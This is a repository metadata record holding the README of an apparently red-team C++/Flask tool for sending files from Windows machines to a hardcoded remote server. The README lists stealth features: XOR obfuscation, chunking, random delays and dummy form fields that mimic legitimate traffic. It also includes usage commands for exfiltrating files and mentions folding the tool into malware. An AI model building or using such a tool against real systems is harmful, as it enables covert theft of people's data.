{"id":26100538,"url":"https://github.com/leshenkazevnoski/exfiltrationtool","last_synced_at":"2025-03-09T17:39:20.684Z","repository":{"id":281443226,"uuid":"945284297","full_name":"LeshenkaZevnoski/ExfiltrationTool","owner":"LeshenkaZevnoski","description":"Data exfiltration tool for penetration testing and red team engagement","archived":false,"fork":false,"pushed_at":"2025-03-09T05:02:38.000Z","size":2228,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-03-09T05:25:10.032Z","etag":null,"topics":["cpp","exfiltration","tool"],"latest_commit_sha":null,"homepage":"","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/LeshenkaZevnoski.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-03-09T04:07:23.000Z","updated_at":"2025-03-09T05:02:41.000Z","dependencies_parsed_at":"2025-03-09T05:35:31.639Z","dependency_job_id":null,"html_url":"https://github.com/LeshenkaZevnoski/ExfiltrationTool","commit_stats":null,"previous_names":["leshenkazevnoski/exfiltrationtool"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/LeshenkaZevnoski%2FExfiltrationTool","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/LeshenkaZevnoski%2FExfiltrationTool/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/LeshenkaZevnoski%2FExfiltrationTool/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/LeshenkaZevnosk
i%2FExfiltrationTool/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/LeshenkaZevnoski","download_url":"https://codeload.github.com/LeshenkaZevnoski/ExfiltrationTool/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":242729460,"owners_count":20175945,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cpp","exfiltration","tool"],"created_at":"2025-03-09T17:39:19.580Z","updated_at":"2025-03-09T17:39:20.679Z","avatar_url":"https://github.com/LeshenkaZevnoski.png","language":"C++","funding_links":[],"categories":[],"sub_categories":[],"readme":"# File Exfiltration Tool\n\n## Overview\nThis project demonstrates a data exfiltration feature written in C++ with a Python-based server for a penetration testing engagement. This tool can also be integrated into other malware functionalities. The tool allows you to exfiltrate files from a client machine to a remote server over HTTP, with options for chunking, delays, and type-specific processing. 
The tool supports various file types (e.g., `.txt`, `.png`, `.docx`, `.pdf`), with image files transferred without encryption for direct usability, while other types are XOR-encrypted for basic obfuscation.\n\n### Features:\n- File type detection and processing (e.g., no encryption for images).\n- Optional chunking to split large files into smaller pieces.\n- Optional random delays between chunks for stealth.\n- Base64 encoding for HTTP transmission.\n- Dummy form fields to mimic legitimate traffic.\n- Simple Python Flask server to receive and reassemble files.\n\n\u003e **Disclaimer:** Unauthorized use for malicious purposes is illegal and unethical. I hold no responsibility for any misuse.\n\n## Prerequisites\n\n### Client (C++)\n- **Operating System:** Windows (uses WinHTTP API).\n- **Compiler:** MSVC (e.g., `cl` via Visual Studio) or MinGW (e.g., `g++`).\n- **Libraries:** WinHTTP (included with Windows).\n\n### Server (Python)\n- **Operating System:** Any (tested on VM Windows/MacOS).\n- **Python:** 3.6+.\n- **Dependencies:** Flask (`pip install flask`).\n- **Network:** Server must be reachable on port 80 (configurable).\n\n## Setup\n\n### Client\n\n#### Clone the Repository:\n```bash\ngit clone https://github.com/yourusername/file-exfiltration-tool.git\ncd file-exfiltration-tool\n```\n\n#### Compile the C++ Code:\n\nUsing MSVC:\n```bash\ncl client.cpp /link winhttp.lib\n```\nUsing MinGW:\n```bash\ng++ client.cpp -o client.exe -lwinhttp\n```\n**Output:** `client.exe`.\n\n### Server\n\n#### Install Dependencies:\n```bash\npip install flask\n```\n\n#### Run the Server:\n![MacOS screenshot](Images/MacOS.png)\n\n1. Save the Python script as `app.py`.\n2. Start it on the target machine (e.g., `192.168.2.214`):\n   ```bash\n   python server.py\n   ```\n3. 
Ensure port `80` is open and the server is reachable.\n\n## Usage\n![VM Windows screenshot](Images/VM_Windows.png)\n\n### Client\nRun the compiled executable with the following syntax:\n```bash\nclient.exe \u003cfile_path\u003e [-c] [-d]\n```\n- `\u003cfile_path\u003e`: Path to the file to exfiltrate (e.g., `image.png`, `doc.docx`).\n- `-c`: Enable chunking (splits file into 1024-byte pieces).\n- `-d`: Enable random delays (1–5 seconds between chunks, requires `-c`).\n\n#### Examples:\nTransfer a PNG file as a single piece:\n```bash\nclient.exe image.png\n```\nTransfer a text file in chunks with delays:\n```bash\nclient.exe notes.txt -c -d\n```\n\n**Output:**\n- Logs bytes read, sent, and server response status.\n- Success message: `\"Data sent successfully to 192.168.2.214.\"`\n\n### Server\n- The server listens on `0.0.0.0:80` and saves received files as `exfiltrated_data.\u003cext\u003e` (e.g., `exfiltrated_data.png`).\n- Logs chunk reception and final file size.\n\n#### Example Output:\n```\nReceived chunk 1 of 3, size: 1368 bytes\nReceived chunk 2 of 3, size: 1368 bytes\nReceived chunk 3 of 3, size: 500 bytes\nFile fully received and saved as exfiltrated_data.png, size: 3236 bytes\n```\n\n## File Type Handling\n- **Images** (`.png`, `.jpg`, `.jpeg`, `.bmp`): Transferred unencrypted.\n- **Text** (`.txt`), **Office** (`.docx`, `.xlsx`), **PDF** (`.pdf`): XOR-encrypted with key `\"mysecretkey\"`.\n- **Other Types**: Default to XOR encryption, saved with `.bin` extension if no extension is detected.\n\n## Notes\n- **Server IP:** Hardcoded to `192.168.2.214:80`. Modify `server_host` and `server_path` in `client.cpp` for a different target.\n- **Chunk Size:** Fixed at `1024` bytes when chunking is enabled. 
Adjust `chunk_size` in `client.cpp` as needed.\n- **Security:** XOR encryption is basic and not secure for real-world use; consider stronger methods for production.\n\n## Troubleshooting\n- **Empty Output File:** Check client/server logs for size mismatches or errors (e.g., `\"WinHttpSendRequest failed: 12029\"` = server unreachable).\n- **Network Issues:** Ensure the server is running and reachable (`ping 192.168.2.214`, `telnet 192.168.2.214 80`).\n- **Corrupted Images:** Verify original file integrity; test without chunking (`client.exe image.png`).\n\n## Contributing\nFeel free to fork this repository and submit pull requests with improvements (e.g., stronger encryption, more file type processors, configuration options).\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fleshenkazevnoski%2Fexfiltrationtool","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fleshenkazevnoski%2Fexfiltrationtool","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fleshenkazevnoski%2Fexfiltrationtool/lists"}